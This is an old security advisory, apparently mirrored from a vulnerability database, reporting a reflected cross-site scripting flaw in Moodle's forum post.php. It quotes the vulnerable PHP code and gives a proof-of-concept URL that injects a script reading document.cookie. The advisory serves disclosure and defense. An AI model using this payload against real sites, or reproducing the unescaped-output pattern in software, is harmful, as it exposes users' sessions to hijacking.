xss in moodle (post.php)

2004-08-0900:00:00

vulners.com

JSON

±-------------------------------+
| |
| XSS in Moodle < 1.3 (post.php) |
| |
±-------------------------------+

Autor: Javier Ubilla Brenni <javierubilla[at]spymac.com>
Date: 02/08/04

Software Description:


&quot;Moodle is a course management system &#40;CMS&#41; - a software package designed to help educators
create quality online courses.&quot;
www.moodle.org

Bug:
~~~

Post.php is vulnerable to an XXS attack.
The bug was found in the $reply variable :

/* Begin of vulnerable code */

    } else if &#40;isset&#40;$reply&#41;&#41; {      // User is writing a new reply

        if &#40;! $parent = forum_get_post_full&#40;$reply&#41;&#41; {
            error&#40;&quot;Parent post ID was incorrect &#40;$reply&#41;&quot;&#41;;
        }
        if &#40;! $discussion = get_record&#40;&quot;forum_discussions&quot;, &quot;id&quot;, $parent-&gt;discussion&#41;&#41; {
            error&#40;&quot;This post is not part of a discussion! &#40;$reply&#41;&quot;&#41;;
        }
        if &#40;! $forum = get_record&#40;&quot;forum&quot;, &quot;id&quot;, $discussion-&gt;forum&#41;&#41; {
            error&#40;&quot;The forum number was incorrect &#40;$discussion-&gt;forum&#41;&quot;&#41;;
        }
        if &#40;! $course = get_record&#40;&quot;course&quot;, &quot;id&quot;, $discussion-&gt;course&#41;&#41; {
            error&#40;&quot;The course number was incorrect &#40;$discussion-&gt;course&#41;&quot;&#41;;
        }

        if &#40;! forum_user_can_post&#40;$forum&#41;&#41; {
            error&#40;&quot;Sorry, but you can not post in this forum.&quot;&#41;;
        }

        if &#40;$cm = get_coursemodule_from_instance&#40;&quot;forum&quot;, $forum-&gt;id, $course-&gt;id&#41;&#41; {
            if &#40;groupmode&#40;$course, $cm&#41; and !isteacheredit&#40;$course-&gt;id&#41;&#41; {   // Make sure
user can post here
                if &#40;mygroupid&#40;$course-&gt;id&#41; != $discussion-&gt;groupid&#41; {
                    error&#40;&quot;Sorry, but you can not post in this discussion.&quot;&#41;;
                }
            }
            if &#40;!$cm-&gt;visible and !isteacher&#40;$course-&gt;id&#41;&#41; {
                error&#40;get_string&#40;&quot;activityiscurrentlyhidden&quot;&#41;&#41;;
            }
        }

/* End of vulnerable code */

Here is the bug:

if &#40;! $parent = forum_get_post_full&#40;$reply&#41;&#41; {
            error&#40;&quot;Parent post ID was incorrect &#40;$reply&#41;&quot;&#41;;

Exploit:
~~~~~~~~

http://www.vulnerable.com/moodle/mod/forum/post.php?reply=&#37;3Cscript&#37;3Ealert&#40;document.cookie&#41;;&#37;3C/script&#37;3E

Solution: 
~~~~~~~~~
Upgrade to the last version

Vendor Status:
~~~~~~~~~~~~~~
Notified.

Credits: Bug found by Javier Ubilla and Ariel.
~~~~~~~

JSON

xss in moodle &#40;post.php&#41;

xss in moodle (post.php)